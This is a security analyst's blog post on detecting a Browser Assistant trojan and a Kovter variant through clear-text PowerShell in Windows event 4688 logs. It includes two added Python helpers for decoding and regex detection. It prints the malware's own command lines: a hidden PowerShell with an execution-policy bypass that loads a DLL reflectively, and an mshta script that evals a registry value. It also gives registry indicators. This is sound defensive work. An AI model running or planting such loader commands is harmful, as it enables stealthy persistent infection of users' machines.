Wednesday, September 25, 2019

PowerShell Encoded Payload In Clear Text in Windows Event Log 4688

Found something kind of interesting that analysts might want to be aware of.

For months, there was this device that kept trying to execute a PowerShell payload.  I could see it in the logs of a well-known vendor.  At first it looked like this, because this vendor decided everything should be in caps:

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ENCODEDCOMMAND JAB3AD0AJABLAG4ADGA6AEEAUABQAEQAQQBUAEEAKWANAFWAQGBYAG8ADWBZAGUACGAGAEEACWBZAGKACWB0AGEABGB0AFWAJWA7AFSAUGBLAGYABABLAGMADABPAG8ABGAUAEEACWBZAGUABQBIAGWAEQBDADOAOGBMAG8AYQBKACGAWWB

I put in a request for them to allow that field to be upper/lower case.  So then I see this:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEAcwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB

The payload decodes to this:

$w=$env:APPDATA+'\Browser Assistant\';[Reflection.Assembly]::Load([

This vendor truncates the payload. >:(
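
The two log lines above show two separate problems for an analyst: Base64 is case-sensitive, so the upper-cased field cannot be decoded at all, while the truncated mixed-case value can still be decoded up to the cut (the -EncodedCommand argument is Base64 over UTF-16LE text). The following Python is an added example, not part of the original post; the function names are hypothetical, the Base64 string is the one logged above, and the upper-cased input is constructed from it with .upper().

```python
import base64
import re

# Base64 argument exactly as logged on this page (cut off by the log vendor).
LOGGED_B64 = (
    "JAB3AD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAnAFwAQgByAG8AdwBzAGUAcgAgAEEA"
    "cwBzAGkAcwB0AGEAbgB0AFwAJwA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUA"
    "bQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwB")
CMDLINE = (r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
           r' -encodedCommand ' + LOGGED_B64)

# A "-e..." switch followed by a Base64 run; the switch name is validated below.
SWITCH = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def extract_encoded_arg(cmdline):
    """Return the -EncodedCommand value; accepts prefix forms (-e, -enc) and -ec."""
    for name, value in SWITCH.findall(cmdline):
        name = name.lower()
        if "encodedcommand".startswith(name) or name == "ec":
            return value
    return None


def case_destroyed(b64):
    """True when a Base64 run has no lowercase letters, i.e. it was upper-cased upstream."""
    letters = [c for c in b64 if c.isalpha()]
    return len(letters) >= 16 and not any(c.islower() for c in letters)


def decode_truncated(b64):
    """Decode as much of a cut-off -EncodedCommand value as is recoverable."""
    b64 = b64.rstrip("=")
    if len(b64) % 4 == 1:            # a lone trailing character carries no whole byte
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)     # re-pad the partial final group
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]   # keep whole UTF-16LE code units only
    return raw.decode("utf-16-le", errors="replace")


if __name__ == "__main__":
    arg = extract_encoded_arg(CMDLINE)
    print(decode_truncated(arg))
    # Mixed-case field is usable; the upper-cased one is flagged as undecodable.
    print(case_destroyed(arg), case_destroyed(extract_encoded_arg(CMDLINE.upper())))
```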
 
I Googled it - thinking I might get lucky.  It's a Browser Assistant Trojan.  https://blog.malwarebytes.com/detections/trojan-browserassistant-ps/
 
Sometimes it's hard to believe something is infected, especially if this AV solution keeps saying that it's blocking it.  I kept looking for the encoded command in PowerShell logs 4103 and 4104 - no luck.
 
Found out that if I did this:

Get-WinEvent -FilterHashtable @{logname="Security";id="4688";} | Select -Expand Message | ?{$_ -like "*powershell*"} | ?{$_ -like "*Reflection*"}

I found it.  It was in clear text!  The examples on security blogs show it in its encoded forms.  I've seen it in the logs as encoded text before.  Why is this one different?

I assume it was in clear text because when that payload was loaded into memory, it was decoded.  The event 4688 in the Security log is for process creation.  The process was actually created.  It's weird because the AV solution said it blocked it.  This has been going on since June, and I finally have proof that there's a problem.  I could try to clean it up, because I have the IOCs in that article, but the IOCs change all the time.  You'll see that the actual decoded payload doesn't match what's in that article.  It loads a specific version of .NET for starters.  The actual decoded payload is this:
 
powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"

I haven't found what keeps starting this.  Looks like I'll have to keep looking.

###Update####

Been a while since I touched this blog.  I've been so busy with cyber defense, CTFs, Holiday Hack.  Never thought that this would be my job, but it is.  Sometimes I feel a little over my head.  I wanted to revisit this for a while.  I did find out what was causing it to execute over a year ago.  The process that kept launching this was a variant of Kovter.  https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless

Found some other indicators and an obfuscated binary in the registry.

"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajfl");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";" <--this kept running over and over again.

HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers
Name: Images <base64encoded binary>

HKLM:\Software\fcscgkz
lqje: <obfuscated binary> - This isn't base64 encoded.  Trust me, you'll know if you see it.  It looks random.
flwxqgajfl: <base64 encoded strings><bunch of hex that looks like shell code.>
uzksi: S6xXx9mdNmjlJA==
ppaj: Q/cIl47JZi1rc8ijJL1FKrCPtHaJv7U=
ggxo: E/BWwN7BYJWCwSskHqL/kjk=
boadvfk: FqcLk4zANi4kDWir28Afgte9/ujOKjBjpDNsCg5OyaP7nnOuSgzYVDskh2OyNaD1KtQqcCIosyWWjkLoFIwTMnlSD1c=
fthhhtkk: <base64 encoded binary>
oass: <base64 encoded binary>
3ecf9d7c3f: what looks like an array of decimals.  Might be byte code or characters in decimal form.

I would hazard a guess that those keys are probably randomized, so they might not look the same from sample to sample.
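
Because the key and value names are probably randomized, matching on the shape of the command lines holds up better than matching on those names. The following Python is an added example, not part of the original post: it triages process-creation (4688) command lines with four patterns taken from the two command lines quoted in this post. The rule names are hypothetical, and the last two (benign) samples are constructed.

```python
import re

# Hypothetical rule names; each regex runs over a 4688 "Process Command Line" value.
RULES = [
    # PowerShell loading a .NET assembly from bytes read off disk.
    ("ps_reflective_load_from_file",
     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(.*ReadAllBytes", re.I)),
    # Hidden window combined with an execution-policy bypass (abbreviated switches included).
    ("ps_hidden_bypass",
     re.compile(r"(?=.*\s-w\w*\s+hidden)(?=.*\s-(?:ep|ex\w*)\s+bypass)", re.I)),
    # mshta handed an inline script instead of an .hta file.
    ("mshta_inline_script",
     re.compile(r"mshta(?:\.exe)?\"?\s+\"?(?:javascript|vbscript):", re.I)),
    # Script that reads a registry value and then evaluates it.
    ("script_regread_eval", re.compile(r"RegRead\(.*eval\(", re.I)),
]

# First two samples: command lines quoted in this post. Last two: constructed benign lines.
SAMPLES = [
    r'''powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "$env:COMPLUS_version='v4.0.30319';&powershell{$w="$env:APPDATA"+'\Browser Assistant\';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Updater.dll'));$i=new-object u.U;$i.ST()}"''',
    r'''"C:\Windows\system32\mshta.exe" "javascript:Bsyy7="qq";eV70=new ActiveXObject("WScript.Shell");oe1OXyOm="S";Vcd8A8=eV70.RegRead("HKCU\\software\\fcscgkz\\flwxqgajfl");G9MfLbiK="4zxH6zWh";eval(Vcd8A8);ul2pbt5YT="UmUVk8mV";"''',
    r'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1',
    r'"C:\Windows\system32\mshta.exe" "C:\Apps\help.hta"',
]


def triage(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def report(cmdlines):
    """Return (hit_count, rule_names, first 60 chars) per line, most hits first."""
    rows = [(len(triage(c)), triage(c), c[:60]) for c in cmdlines]
    return sorted(rows, key=lambda row: -row[0])


if __name__ == "__main__":
    for hits, names, head in report(SAMPLES):
        print(hits, names, head)
```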











2 comments:

  1. I discovered the same malware executing from AppData\Local\Facebook\Games\FacebookGameroom.exe


    Associated event:
    "Facebook Gameroom Browser.exe" --type=gpu-process --no-sandbox --lang=en-US --log-file="C:\Users\xxxxxxx\AppData\Local\Facebook\Games\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/xxxxx (KHTML, like Gecko) Chrome/xxxxx CanvasFrame/xxxxx Safari/xxxxx FacebookCanvasDesktop FBAN/GamesWindowsDesktopApp FBAV/1.22.7235.32722" --gpu-vendor-id=0x8086 --gpu-device-id=0x0152 --gpu-driver-vendor="Intel Corporation" --gpu-driver-version=9.17.10.4459 --gpu-driver-date=5-19-2016 --lang=en-US --log-file="C:\Users\xxxxxxx\AppData\Local\Facebook\Games\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/xxxxx(KHTML, like Gecko) Chrome/xxxxx CanvasFrame/xxxxx Safari/xxxxx FacebookCanvasDesktop FBAN/GamesWindowsDesktopApp FBAV/1.22.7235.32722" --service-request-channel-token=***** --mojo-platform-channel-handle=2400 /prefetch:2
